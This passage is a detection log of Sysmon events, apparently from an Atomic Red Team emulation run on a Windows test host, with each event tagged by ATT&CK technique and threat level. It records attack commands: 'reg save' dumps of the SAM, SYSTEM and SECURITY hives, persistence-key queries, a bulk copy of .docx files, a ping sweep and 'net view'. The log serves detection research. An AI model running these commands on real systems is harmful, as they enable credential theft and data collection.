747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3727 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.202 + 747F3D96-D890-5D31-0000-0010FA3F3200 + 1568 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3725 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.011 + 747F3D96-D890-5D31-0000-001012383200 + 608 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D88F-5D31-0000-0010BD353200 + 2780 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3724 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:51.971 + 747F3D96-D88F-5D31-0000-0010BD353200 + 2780 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3723 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:43.520 + 747F3D96-D887-5D31-0000-0010D51F3200 + 752 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3721 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:41.646 + 747F3D96-D885-5D31-0000-00107F1A3200 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3719 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:39.214 + 747F3D96-D883-5D31-0000-0010839B3100 + 3904 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3717 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.603 + 747F3D96-D87D-5D31-0000-0010958F3100 + 1728 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3715 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.541 + 747F3D96-D87D-5D31-0000-0010FA8A3100 + 3868 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3713 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.365 + 747F3D96-D87D-5D31-0000-0010CA843100 + 3900 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3711 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.284 + 747F3D96-D87D-5D31-0000-00103B803100 + 324 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3709 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.209 + 747F3D96-D87D-5D31-0000-0010B37B3100 + 3616 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3707 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.113 + 747F3D96-D87D-5D31-0000-00102B773100 + 2148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3705 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.019 + 747F3D96-D87D-5D31-0000-001090723100 + 196 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3703 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.956 + 747F3D96-D87C-5D31-0000-0010056E3100 + 4220 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3701 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.900 + 747F3D96-D87C-5D31-0000-00107C693100 + 1740 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3699 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.842 + 747F3D96-D87C-5D31-0000-0010E1643100 + 5936 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3697 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.775 + 747F3D96-D87C-5D31-0000-001056603100 + 6832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3773 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:34.991 + 747F3D96-D8F6-5D31-0000-001091D13300 + 4528 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3772 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:34.779 + 747F3D96-D8F6-5D31-0000-00100FCB3300 + 3344 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3771 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.330 + 747F3D96-D8EA-5D31-0000-00108AB83300 + 4684 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3771 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.330 + 747F3D96-D8EA-5D31-0000-00108AB83300 + 4684 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + 